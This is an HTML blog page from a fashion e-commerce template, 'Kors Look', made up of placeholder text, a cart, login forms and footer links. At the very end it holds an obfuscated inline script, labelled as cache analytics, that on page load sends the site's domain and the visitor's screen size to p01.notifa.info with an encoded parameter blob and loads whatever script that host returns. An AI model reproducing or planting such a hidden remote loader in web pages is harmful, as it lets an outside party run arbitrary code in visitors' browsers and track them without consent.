<!DOCTYPE html>
<html lang="en">
<head>
<!-- =====  BASIC PAGE NEEDS  ===== -->
<meta charset="utf-8">
<title>Kors Look</title>
<!-- =====  SEO MATE  ===== -->
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="distribution" content="global">
<meta name="revisit-after" content="2 Days">
<meta name="robots" content="ALL">
<meta name="rating" content="8 YEARS">
<meta name="Language" content="en-us">
<meta name="GOOGLEBOT" content="NOARCHIVE">
<!-- =====  MOBILE SPECIFICATION  ===== -->
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="viewport" content="width=device-width">
<!-- =====  CSS  ===== -->
<link href="Bootstrap/css/bootstrap.css" rel="stylesheet">
<link href="css/style.css" rel="stylesheet" type="text/css">
<link href="css/font-awesome.css" rel="stylesheet" type="text/css">
<link href='https://fonts.googleapis.com/css?family=Poppins:300,500,600,700' rel='stylesheet' type='text/css'>
<link href="css/owl.carousel.css" rel="stylesheet" type="text/css">
<link rel="icon" type="image/png" href="images/favicon.png">
<link rel="apple-touch-icon" href="images/favicon.png">
</head>
<body>
<div class="wrapar"> 
  <!-- Header Start-->
  <div class="header">
    <div class="header-top">
      <div class="container">
        <div class="call pull-left">
          <p>Call us toll free : <span>+1324 353 4689</span></p>
        </div>
        <div class="user-info pull-right">
          <div class="user">
            <ul>
              <li><a href="#" data-toggle="modal" data-target="#login">Login</a> 
                <!-- Modal -->
                <div class="modal fade" id="login" role="dialog">
                  <div class="modal-dialog"> 
                    <!-- Modal content-->
                    <div class="modal-content">
                      <div class="modal-header">
                        <div class="panel-heading">
                          <div class="panel-title pull-left">Login</div>
                          <div class="pull-right"><a href="#">Forgot password?</a>
                            <button aria-hidden="true" data-dismiss="modal" class="close btn btn-xs " type="button"> <i class="fa fa-times"></i> </button>
                          </div>
                        </div>
                      </div>
                      <div class="modal-body">
                        <form id="loginform" class="form-horizontal">
                          <div class="input-group"> <span class="input-group-addon"><i class="glyphicon glyphicon-user"></i></span>
                            <input id="login-username" type="text" class="form-control" name="username" value="" placeholder="username or email">
                          </div>
                          <div class="input-group"> <span class="input-group-addon"><i class="glyphicon glyphicon-lock"></i></span>
                            <input id="login-password" type="password" class="form-control" name="password" placeholder="password">
                          </div>
                          <div class="input-group">
                            <div class="checkbox">
                              <label>
                                <input id="login-remember" type="checkbox" name="remember" value="1">
                                Remember me</label>
                            </div>
                          </div>
                          <div class="form-group"> 
                            <!-- Button -->
                            <div class="col-sm-12 controls"> <a id="btn-login" href="#" class="btn btn-primary btn-success">Login</a> <a id="btn-fblogin" href="#" class="btn btn-primary facebook">Login with</a> </div>
                          </div>
                        </form>
                      </div>
                      <div class="modal-footer">
                        <div class="form-group">
                          <div class="col-md-12 control">
                            <div>Don't have an account! <a href="#">Sign Up Here</a></div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </li>
              <li><a href="#" data-toggle="modal" data-target="#register">Register</a>
                <div class="modal fade" id="register" role="dialog">
                  <div class="modal-dialog"> 
                    <!-- Modal content-->
                    <div class="modal-content">
                      <div class="modal-header">
                        <div class="panel-heading">
                          <div class="panel-title pull-left">Register</div>
                          <div class="pull-right">
                            <button aria-hidden="true" data-dismiss="modal" class="close" type="button"><i class="fa fa-times"></i> </button>
                          </div>
                        </div>
                      </div>
                      <div class="modal-body">
                        <div class="control-group"> 
                          <!-- Username -->
                          <label class="control-label"  for="username">Username</label>
                          <div class="controls">
                            <input type="text" id="username" name="username" placeholder="" class="input-xlarge">
                            <p class="help-block">Username can contain any letters or numbers, without spaces</p>
                          </div>
                        </div>
                        <div class="control-group"> 
                          <!-- E-mail -->
                          <label class="control-label" for="email">E-mail</label>
                          <div class="controls">
                            <input type="text" id="email" name="email" placeholder="" class="input-xlarge">
                            <p class="help-block">Please provide your E-mail</p>
                          </div>
                        </div>
                        <div class="control-group"> 
                          <!-- Password-->
                          <label class="control-label" for="password">Password</label>
                          <div class="controls">
                            <input type="password" id="password" name="password" placeholder="" class="input-xlarge">
                            <p class="help-block">Password should be at least 4 characters</p>
                          </div>
                        </div>
                        <div class="control-group"> 
                          <!-- Password -->
                          <label class="control-label"  for="password_confirm">Password (Confirm)</label>
                          <div class="controls">
                            <input type="password" id="password_confirm" name="password_confirm" placeholder="" class="input-xlarge">
                            <p class="help-block">Please confirm password</p>
                          </div>
                        </div>
                        <div class="control-group"> 
                          <!-- Button -->
                          <div class="controls">
                            <button class="btn btn-success">Register</button>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
    <div class="header-mid">
      <div class="container">
        <div class="row">
          <div class="col-md-3 header-left">
            <div class="logo"> <a href="index.html"><img src="images/logo.png" alt="#"></a> </div>
          </div>
          <div class="col-md-6 search_block">
            <div class="search">
              <form action="grid-view.html">
                <div class="search_cat">
                  <select class="search-category" name="search-category">
                    <option class="computer" selected>All Categories</option>
                    <option class="computer">Men</option>
                    <option class="computer">Women</option>
                    <option class="computer">Kids</option>
                    <option class="computer">Computer</option>
                    <option class="computer">Electronics</option>
                  </select>
                  <span class="fa fa-angle-down"></span> </div>
                <input type="text" placeholder="Search...">
                <button type="submit" class="btn submit"> <span class="fa fa-search"></span></button>
              </form>
            </div>
          </div>
          <div class="col-md-3 header-right">
            <div class="cart">
              <div class="cart-icon dropdown"></div>
              <a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="dropdown-toggle" href="cart.html">My Cart( 2 )<span> $261.20</span></a>
              <ul class="dropdown-menu pull-right cart-dropdown-menu">
                <li>
                  <table class="table table-striped">
                    <tbody>
                      <tr>
                        <td class="text-center"><a href="product.html"><img class="img-thumbnail" src="images/product/car3-70x92.jpg" alt="img"></a></td>
                        <td class="text-left"><a href="#">Black African Print Pencil Skirt</a></td>
                        <td class="text-right quality">X1</td>
                        <td class="text-right price-new">$254.00</td>
                        <td class="text-center"><button type="button" title="Remove" class="btn btn-xs remove"><i class="fa fa-times"></i></button></td>
                      </tr>
                      <tr>
                        <td class="text-center"><a href="product.html"><img class="img-thumbnail" src="images/product/car3-70x92.jpg" alt="img"></a></td>
                        <td class="text-left"><a href="#">Black African Print Pencil Skirt</a></td>
                        <td class="text-right quality">X1</td>
                        <td class="text-right price-new">$254.00</td>
                        <td class="text-center"><button type="button" title="Remove" class="btn btn-xs remove"><i class="fa fa-times"></i></button></td>
                      </tr>
                    </tbody>
                  </table>
                </li>
                <li>
                  <div class="minitotal">
                    <table class="table pricetotal">
                      <tbody>
                        <tr>
                          <td class="text-right"><strong>Sub-Total</strong></td>
                          <td class="text-right price-new">$210.00</td>
                        </tr>
                        <tr>
                          <td class="text-right"><strong>Eco Tax (-2.00)</strong></td>
                          <td class="text-right price-new">$2.00</td>
                        </tr>
                        <tr>
                          <td class="text-right"><strong>VAT (20%)</strong></td>
                          <td class="text-right price-new">$42.00</td>
                        </tr>
                        <tr>
                          <td class="text-right"><strong>Total</strong></td>
                          <td class="text-right price-new">$254.00</td>
                        </tr>
                      </tbody>
                    </table>
                    <div class="controls"> <a class="btn btn-primary pull-left" href="cart.html" id="view-cart"><i class="fa fa-shopping-cart"></i> View Cart </a> <a class="btn btn-primary pull-right" href="checkout.html" id="checkout"><i class="fa fa-share"></i> Checkout</a> </div>
                  </div>
                </li>
              </ul>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="header-bottom">
      <div class="container">
        <div class="row">
          <div class="col-md-12">
            <div class="new-further">
              <p>New in kors look  : </p>
              <ul class="toggle-newinFurther">
                <li><a href="#">Women</a></li>
                <li><a href="#">Clothing</a></li>
                <li><a href="#">Nightwear</a></li>
                <li><a href="#">Panties</a></li>
              </ul>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <!-- Header End --> 
  
  <!-- Main menu Start -->
  <div id="main-menu">
    <div class="container">
      <nav class="navbar navbar-default">
        <div class="navbar-header">
          <button aria-controls= "navbar" data-target="#navbar" data-toggle="collapse" class="navbar-toggle collapsed" type="button"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button>
          <a href="#" class="navbar-brand">menu</a> </div>
        <div class="navbar-collapse collapse" id="navbar">
          <ul class="nav navbar-nav">
            <li><a href="index.html">HOME</a></li>
            <li><a href="grid-view.html">WOMEN</a></li>
            <li><a href="grid-view.html">MEN</a><span class="new">new</span></li>
            <li class="dropdown"> <a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="dropdown-toggle" href="#"> PAGES<span class="caret"></span></a>
              <ul class="dropdown-menu">
                <li><a href="checkout.html">Checkout</a></li>
                <li><a href="cart.html">Shoping Cart</a></li>
                <li><a href="checkout-step1.html">Billing & shipping address</a></li>
                <li><a href="checkout-step2.html">Delivery method </a></li>
                <li><a href="checkout-step3.html">Payment method</a></li>
                <li><a href="checkout-step4.html">Order riview</a></li>
                <li><a href="404.html">Page Notfound</a></li>
              </ul>
            </li>
            <li><a href="blog.html">BLOG</a></li>
            <li><a href="contact-us.html">CONTACT US</a></li>
            <li><a href="about-us.html">ABOUT US</a></li>
          </ul>
        </div>
      </nav>
    </div>
  </div>
  <!-- Main menu End --> 
  
  <!-- offer block Start  -->
  <div id="offer">
    <div class="container">
      <div class="offer">
        <p>30 New Mega Sales. Upto 80% Off. Starting Everyday at 9 AM.</p>
      </div>
    </div>
  </div>
  <!-- offer block end  --> 
  
  <!-- bredcrumb and page title block start  -->
  <div id="bread-crumb">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-3">
          <div class="page-title">
            <h4>Blog</h4>
          </div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-9">
          <div class="bread-crumb">
            <ul>
              <li><a href="index.html">home</a></li>
              <li>\</li>
              <li><a href="blog.html">blog</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <!-- bredcrumb and page title block end  -->
  
  <div id="blog-page-contain">
    <div class="container">
      <div class="row">
        <div class="col-md-9 col-sm-8"> 
          
          <!-- left block Start  -->
          <div id="left">
            <div class="single-post-item">
              <div class="post-image"> <a href="#"><img src="images/blog1.jpg" alt=""></a> </div>
              <div class="single-post-details">
                <div class="post-title">
                  <h4><a href="#">Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure
                    Virginia, looked up one of the more</a></h4>
                </div>
                <div class="description">
                  <p>make a type specimen book. It has survived not only five centuries, but also the leap into electronic type setting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset ators on the Internet tend to repeat predefined chunks as necessary, making </p>
                  <br>
                  <p>make a type specimen book. It has survived not only five centuries, but also the leap into electronic typese tting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset ators on the Internet tend to repeat predefined chunks as necessary, making make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset ators on the Internet tend to repeat predefined chunks as necessary, making make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesettingrepeat predefined chunks as necessary, making </p>
                  <div class="post-meta">
                    <div class="chat"> <a href="#"> <i class="fa fa-comment"></i> <span class="chat-number">324</span> </a> </div>
                    <div class="date"> <span class="date-month">Jan</span> <span class="date-day">16</span> <span class="date-year">2015</span> </div>
                    <div class="comments"> <a href="#"> <i class="fa fa-share"></i> <span class="comments-number">324</span> </a> </div>
                  </div>
                </div>
              </div>
            </div>
            <div class="navigation">
              <div class="pull-left"> <a href="#" title="previous">Previous Post</a> </div>
              <div class="pull-right"> <a href="#" title="next">Next Post</a> </div>
            </div>
            <div class="comments-area">
              <h4>Comments<span>(2)</span></h4>
              <ul class="comment-list ">
                <li>
                  <div class="comment-user"> <img src="images/comment-user.jpg" alt="further"> </div>
                  <div class="comment-detail">
                    <h6>John Doe</h6>
                    <div class="post-info">
                      <ul>
                        <li>Fab 11, 2016</li>
                        <li><a href="#"><i class="fa fa-reply"></i>Reply</a></li>
                      </ul>
                    </div>
                    <p>Consectetur adipiscing elit integer sit amet augue laoreet maximus nuncac.</p>
                  </div>
                  <ul class="comment-list child-comment">
                    <li>
                      <div class="comment-user"> <img src="images/comment-user.jpg" alt="further"> </div>
                      <div class="comment-detail">
                        <h6>John Doe</h6>
                        <div class="post-info">
                          <ul>
                            <li>Fab 11, 2016</li>
                            <li><a href="#"><i class="fa fa-reply"></i>Reply</a></li>
                          </ul>
                        </div>
                        <p>Consectetur adipiscing elit integer sit amet augue laoreet maximus nuncac.</p>
                      </div>
                    </li>
                    <li>
                      <div class="comment-user"> <img src="images/comment-user.jpg" alt="further"> </div>
                      <div class="comment-detail">
                        <h6>John Doe</h6>
                        <div class="post-info">
                          <ul>
                            <li>Fab 11, 2016</li>
                            <li><a href="#"><i class="fa fa-reply"></i>Reply</a></li>
                          </ul>
                        </div>
                        <p>Consectetur adipiscing elit integer sit amet augue laoreet maximus nuncac.</p>
                      </div>
                    </li>
                  </ul>
                </li>
                <li>
                  <div class="comment-user"> <img src="images/comment-user.jpg" alt="further"> </div>
                  <div class="comment-detail">
                    <h6>John Doe</h6>
                    <div class="post-info">
                      <ul>
                        <li>Fab 11, 2016</li>
                        <li><a href="#"><i class="fa fa-reply"></i>Reply</a></li>
                      </ul>
                    </div>
                    <p>Consectetur adipiscing elit integer sit amet augue laoreet maximus nuncac.</p>
                  </div>
                </li>
              </ul>
            </div>
            <div class="reply">
              <div class="Reply -title">
                <h4 class="tf">Leave a Reply </h4>
              </div>
              <form>
                <div class="row">
                  <div class="col-md-12">
                    <div class="input-group">
                      <textarea placeholder="Comment *" id="textarea_message" name="contact-message" class="form-control"></textarea>
                    </div>
                  </div>
                  <div class="col-md-7 col-sm-12">
                    <div class="input-group">
                      <input type="text" required placeholder="Name * " class="form-control" >
                    </div>
                    <!-- /input-group -->
                    <div class="input-group">
                      <input type="email" required placeholder="e-mail *" class="form-control">
                    </div>
                    <!-- /input-group -->
                    <div class="input-group">
                      <input type="text" placeholder="Your website" class="form-control">
                    </div>
                    <!-- /input-group -->
                    <div class="btn btn-large btn-primary">
                      <input type="submit" value="Post" name="submit">
                    </div>
                  </div>
                </div>
              </form>
            </div>
          </div>
          <!-- left block end  --> 
        </div>
        <div class="col-md-3 col-sm-4"> 
          <!-- right block Start  -->
          <div id="right">
            <div class="sidebar-widget">
              <div class="sidebar-title">
                <h4> Categories </h4>
              </div>
              <ul class="title-toggle">
                <li><a href="blog.html">Photoshop (10)</a></li>
                <li><a href="blog.html">WordPress (4)</a></li>
                <li><a href="blog.html">Core PHP (5)</a></li>
                <li><a href="blog.html">Graphic Design (15)</a></li>
                <li><a href="blog.html">e-Commerce Developars (3)</a></li>
                <li><a href="blog.html">Android Dev (7)</a></li>
                <li><a href="blog.html">Web Designing (9)</a></li>
              </ul>
            </div>
            <div class="sidebar-widget">
              <div class="sidebar-title">
                <h4>Tags</h4>
              </div>
              <ul class="tagcloud title-toggle">
                <li><a href="#">gallery</a></li>
                <li><a href="#">grid</a></li>
                <li><a href="#">large</a></li>
                <li><a href="#">quote</a></li>
                <li><a href="#">personal</a></li>
                <li><a href="#">simple</a></li>
                <li><a href="#">Wedding</a></li>
                <li><a href="#">slider</a></li>
                <li><a href="#">trending</a></li>
                <li><a href="#">youtube</a></li>
              </ul>
            </div>
            <div class="sidebar-widget latest-blog">
              <div class="sidebar-title">
                <h4>Latest blog</h4>
              </div>
              <ul class="title-toggle">
                <li>
                  <div class="blog-post ">
                    <div class="item col-md-4">
                      <div class="image"><a href="blog.html"><img class="img-responsive" title="T-shirt" alt="T-shirt" src="images/blog2.jpg"></a> </div>
                    </div>
                    <div class="item col-md-8">
                      <div class="blog-details">
                        <div class="blog-name">
                          <h5><a href="blog.html">Black African Print Pencil Skirt </a></h5>
                          <span class="blog-date">06/07/2015</span> </div>
                      </div>
                    </div>
                  </div>
                </li>
                <li>
                  <div class="blog-post ">
                    <div class="item col-md-4">
                      <div class="image"><a href="blog.html"><img class="img-responsive" title="T-shirt" alt="T-shirt" src="images/blog3.jpg"></a> </div>
                    </div>
                    <div class="item col-md-8">
                      <div class="blog-details">
                        <div class="blog-name">
                          <h5><a href="blog.html">Black African Print Pencil Skirt </a></h5>
                          <span class="blog-date">06/07/2015</span> </div>
                      </div>
                    </div>
                  </div>
                </li>
                <li>
                  <div class="blog-post ">
                    <div class="item col-md-4">
                      <div class="image"><a href="blog.html"><img class="img-responsive" title="T-shirt" alt="T-shirt" src="images/blog5.jpg"></a> </div>
                    </div>
                    <div class="item col-md-8">
                      <div class="blog-details">
                        <div class="blog-name">
                          <h5><a href="blog.html">Black African Print Pencil Skirt </a></h5>
                          <span class="blog-date">06/07/2015</span> </div>
                      </div>
                    </div>
                  </div>
                </li>
                <li>
                  <div class="blog-post ">
                    <div class="item col-md-4">
                      <div class="image"><a href="blog.html"><img class="img-responsive" title="T-shirt" alt="T-shirt" src="images/blog4.jpg"></a> </div>
                    </div>
                    <div class="item col-md-8">
                      <div class="blog-details">
                        <div class="blog-name">
                          <h5><a href="blog.html">Black African Print Pencil Skirt </a></h5>
                          <span class="blog-date">06/07/2015</span> </div>
                      </div>
                    </div>
                  </div>
                </li>
              </ul>
            </div>
          </div>
          
          <!-- right block end  --> 
        </div>
      </div>
    </div>
  </div>
  
  <!-- Footer block Start  -->
  <footer id="footer">
    <div class="container">
      <div class="row">
        <div class="col-md-12">
          <div class= "newslatter">
            <form>
              <h2>Be the first to hear our exciting news</h2>
              <div class="input-group">
                <input class=" form-control" type="text" placeholder="Email Here......">
                <button type="submit" value="Sign up" class="btn btn-large btn-primary">Sign up</button>
              </div>
            </form>
          </div>
        </div>
      </div>
      <div class="row">
        <div class="col-md-3">
          <div class="about">
            <div class="footer-logo"></div>
            <p>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature in Virginia</p>
          </div>
        </div>
        <div class="col-md-3">
          <div class="new-store">
            <h4>What's in store</h4>
            <ul class="toggle-footer">
              <li><a href="#">Returns</a></li>
              <li><a href="#">Delivery Options</a></li>
              <li><a href="#">Brand Directory</a></li>
              <li><a href="#">Buying Guides</a></li>
              <li><a href="#">My Account</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3">
          <div class="information">
            <h4>information</h4>
            <ul class="toggle-footer">
              <li><a href="#">Returns</a></li>
              <li><a href="#">Delivery Options</a></li>
              <li><a href="#">Brand Directory</a></li>
              <li><a href="#">Buying Guides</a></li>
              <li><a href="#">My Account</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3">
          <div class="contact">
            <h4>Contact Us</h4>
            <ul class="toggle-footer">
              <li> <i class="fa fa-map-marker"></i>
                <div class="address-info">Warehouse & Offices 12345 Street name,California, USA </div>
              </li>
              <li> <i class="fa fa-mobile"></i>
                <div class="call-info">+91 987-654-321<br>
                  <span>+0987-654-321</span> </div>
              </li>
              <li> <i class="fa fa-envelope"></i>
                <div class="email-info"> <a href="#">support@lionode.com</a></div>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
    <div class="footer-bottom">
      <div class="container">
        <div class="row">
          <div class="col-md-12">
            <div class="social-link">
              <ul>
                <li><a href="#"><i class="fa fa-facebook"></i></a></li>
                <li><a href="#"><i class="fa fa-twitter"></i></a></li>
                <li><a href="#"><i class="fa fa-google-plus"></i></a></li>
                <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
                <li><a href="#"><i class="fa fa-pinterest-p"></i></a></li>
                <li><a href="#"><i class="fa fa-instagram"></i></a></li>
              </ul>
            </div>
          </div>
        </div>
        <div class="row">
          <div class="col-md-12">
            <div class="footer-link">
              <ul>
                <li><a href="#">Specials</a></li>
                <li><a href="#">Affiliates</a></li>
                <li><a href="#">Gift Vouchers</a></li>
                <li><a href="#">Brands</a></li>
                <li><a href="#">Returns</a></li>
                <li><a href="#">Site Map</a></li>
                <li><a href="#">Contact Us</a></li>
              </ul>
            </div>
          </div>
        </div>
        <div class="row">
          <div class="col-md-12">
            <div class="copy-right">
              <p> All Rights Reserved. Copyright 2017 Powered by lionode.</p>
            </div>
          </div>
        </div>
      </div>
      <div class="footer-offer">
        <h2>$2.55 Next Day Delivery! Ends 8PM ! USE CODE FLASH</h2>
      </div>
    </div>
  </footer>
  <!-- Footer block End  --> 
</div>
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> 
<script src="js/jQuery.js"></script> 
<!-- Include all compiled plugins (below), or include individual files as needed --> 
<script src="Bootstrap/js/bootstrap.js"></script>
<script src="js/owl.carousel.min.js"></script> 
<script src="js/globle.js"></script>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXcpKjpiHDqCUpaRsLunxeSjA3EejY2BzKaEGoA6BYRk5tD8IjFYDLGV0rx9VUNIstiEX43Ll4wEc7i62yoIqmOH%2bx5DGwdwV%2brva%2fbOrkYyLHKXS56OUgoW8QcdrN%2fPMra37chTJ0pYq%2fnuAcs6rrmJ2Gcclb4IsgQeVT2H5mympxo8npfuvUt5nIIoHh25ByNGsnK7b1thJEpouRsN8pw7VtXYctMBs0gfNyObsWgQmu1BR9gFVYimj6%2f6TedMcDPBnNODD2WHlSPKuWEWCcx6Pbgz1vjZRRqYeY1Qy%2b%2bRzieir8LX7XiIHvcSLoF%2fpVAAzbbRJ5UTBR9njl01fhqDxA81iwOBEvmxnq8Y2Xd5nf2iA%2b1a40T2tiREMgq%2ffpJHcTrC5yR0Et9%2bEDYZwW1k9CWULmmIkcP3aTCTXfOA7PxwxOK%2f1gWZOXr0WBE3J%2bQQKj4YDgUma81urjcD5Vjvg9inoSYWqH921YQqvWlmI%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>